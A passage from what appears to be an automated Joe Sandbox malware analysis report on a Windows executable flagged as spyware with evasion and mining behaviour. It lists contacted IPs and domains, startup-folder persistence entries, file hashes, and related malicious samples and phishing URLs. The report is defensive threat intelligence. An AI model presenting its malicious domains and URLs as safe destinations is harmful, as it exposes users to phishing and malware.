                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                          23.219.82.8
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                          104.21.80.52
                                                                                                                                                                                                          		bamarelakij.siteUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                          		unknownunknownfalse

                                                                                                                                                                                                          Private

                                                                                                                                                                                                          IP
                                                                                                                                                                                                          192.168.2.8
                                                                                                                                                                                                          192.168.2.4

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                          Analysis ID:1586711
                                                                                                                                                                                                          Start date and time:2025-01-09 14:53:12 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 11m 50s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                                                                                                          Number of analysed new started processes analysed:30
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:kXzODlqJak.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.spyw.evad.mine.winEXE@64/285@23/18
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 96%
                                                                                                                                                                                                          • Number of executed functions: 90
                                                                                                                                                                                                          • Number of non-executed functions: 273
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 199.232.214.172, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.238, 13.107.6.158, 13.107.42.16, 2.16.168.107, 2.16.168.120, 108.141.15.7, 88.221.110.195, 88.221.110.179, 2.23.227.221, 2.23.227.215, 2.23.227.208, 204.79.197.237, 13.107.21.237, 2.23.227.216, 2.23.227.196, 2.23.227.197, 13.74.129.1, 172.205.80.42, 142.251.40.131, 142.250.80.67, 142.250.72.99, 142.250.65.163, 52.149.20.212, 13.107.246.45, 184.28.90.27, 94.245.104.56, 20.190.159.0, 23.200.0.6, 13.107.246.40, 13.91.222.61, 104.117.182.43, 20.75.60.91
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, prod-agic-we-6.westeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, prod-agic-ne-8.northeurope.cloudapp.azure.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, assets2.msn.com.edgekey.net, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.com, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Execution Graph export aborted for target RescueCDBurner.exe, PID 3772 because there are no executed function
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: kXzODlqJak.exe

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          14:54:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT4269.tmp
                                                                                                                                                                                                          14:54:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          23.219.82.19file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            162.159.61.3https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                  malw.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                    malw.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                        SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                              184.28.190.91file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                131.253.33.203https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  vMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                        invoice 700898 for wallcentre.com.shtmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          https://ecouterrepondeurvocal.pro/35-hnJZibGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            edge_x86_KB91412024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              https://unanimcar.club/a3662561be7feec2969c9f2dcb3bc8d0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9zdXBwb3J0LXRlYW1zbTM2MC5jYy8/aldFUz1iRzl5WlhSMFlTNXJaV0Z1WlVCaGNtTmhaR2xoYzI5c2RYUnBiMjV6TG1OdmJRPT0=Get hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                  denuncia-6spnpo.PDF.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    23.219.82.58pyjnkasedf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        bamarelakij.site24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 172.67.174.91
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 172.67.174.91
                                                                                                                                                                                                                                                        w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        sb.scorecardresearch.comhttps://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.38
                                                                                                                                                                                                                                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                                                        • 18.244.18.27
                                                                                                                                                                                                                                                        https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        • 18.244.18.32
                                                                                                                                                                                                                                                        http://indyhumane.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.38
                                                                                                                                                                                                                                                        LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.32
                                                                                                                                                                                                                                                        w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.27
                                                                                                                                                                                                                                                        w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.32
                                                                                                                                                                                                                                                        chrome.cloudflare-dns.comhttps://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                        Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                        SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                        SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                        SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                        LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                        ssl.bingadsedgeextension-prod-europe.azurewebsites.net24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                                                                                                        BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 94.245.104.56

                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        AMAZON-02UShttps://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 65.9.66.27
                                                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 3.171.139.66
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 18.244.18.38
                                                                                                                                                                                                                                                        main_x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 18.230.152.183
                                                                                                                                                                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 18.151.37.12
                                                                                                                                                                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                                                        arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 13.240.51.3
                                                                                                                                                                                                                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 13.232.148.88
                                                                                                                                                                                                                                                        AKAMAI-ASN1EUhttps://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.70.121.24
                                                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.51.149.177
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.28.190.59
                                                                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.78.146.158
                                                                                                                                                                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.63.23.113
                                                                                                                                                                                                                                                        spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.194.118.65
                                                                                                                                                                                                                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.199.18.240
                                                                                                                                                                                                                                                        x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.77.244.206
                                                                                                                                                                                                                                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                                                        • 104.70.121.217
                                                                                                                                                                                                                                                        AKAMAI-ASN1EUhttps://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.70.121.24
                                                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.51.149.177
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.28.190.59
                                                                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.78.146.158
                                                                                                                                                                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.63.23.113
                                                                                                                                                                                                                                                        spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.194.118.65
                                                                                                                                                                                                                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.199.18.240
                                                                                                                                                                                                                                                        x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 23.77.244.206
                                                                                                                                                                                                                                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                                                        • 104.70.121.217
                                                                                                                                                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUShttps://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 131.253.33.203
                                                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 204.79.197.219
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 20.189.173.28
                                                                                                                                                                                                                                                        https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        • 13.107.253.45
                                                                                                                                                                                                                                                        https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        • 20.42.73.31
                                                                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 22.170.57.197
                                                                                                                                                                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 20.74.19.248
                                                                                                                                                                                                                                                        arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 20.64.30.232
                                                                                                                                                                                                                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 22.183.20.33

                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e124EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        digitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        NvOxePa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        digitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        h3VYJaQqI9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52
                                                                                                                                                                                                                                                        uU6IvUPN39.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.80.52

                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe8Rmoal0v85.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          K3UtwU3CH9.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              VmjvNTbD5J.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                1wrLmYiC62.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  vV5EOx0ipU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    8Rmoal0v85.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7d0b0254-52fd-42f4-97c8-cd87f5f07117.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44629
                                                                                                                                                                                                                                                                          Entropy (8bit):6.096060598935859
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kUbLmZlGjrgb5UhUzvNbu7KwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynRGe5uKoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:7E6363E2A8F5B669501459D245B7DBC4
                                                                                                                                                                                                                                                                          SHA1:7FFF20568EC8334BE23EB0636FB3254BE15163AE
                                                                                                                                                                                                                                                                          SHA-256:70419001F5F268B7421AF84356A5490FD59B16A072EF1842FC16981FB52AC539
                                                                                                                                                                                                                                                                          SHA-512:D27E15F5019C8784FB06DCC78D2E5236EEAAB0C62A8BD8C12DBB23EB15489C2707F20363AAD83607DC64F8729D65B265C2518FCE39631B56094598BE2AEA0DA9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9dcc213b-d01f-4785-8af9-94d492e245bb.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):44629
                                                                                                                                                                                                                                                                          Entropy (8bit):6.096060598935859
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kUbLmZlGjrgb5UhUzvNbu7KwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynRGe5uKoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:7E6363E2A8F5B669501459D245B7DBC4
                                                                                                                                                                                                                                                                          SHA1:7FFF20568EC8334BE23EB0636FB3254BE15163AE
                                                                                                                                                                                                                                                                          SHA-256:70419001F5F268B7421AF84356A5490FD59B16A072EF1842FC16981FB52AC539
                                                                                                                                                                                                                                                                          SHA-512:D27E15F5019C8784FB06DCC78D2E5236EEAAB0C62A8BD8C12DBB23EB15489C2707F20363AAD83607DC64F8729D65B265C2518FCE39631B56094598BE2AEA0DA9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9e3e4146-9c9d-4ce6-9467-c79b9852eb53.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
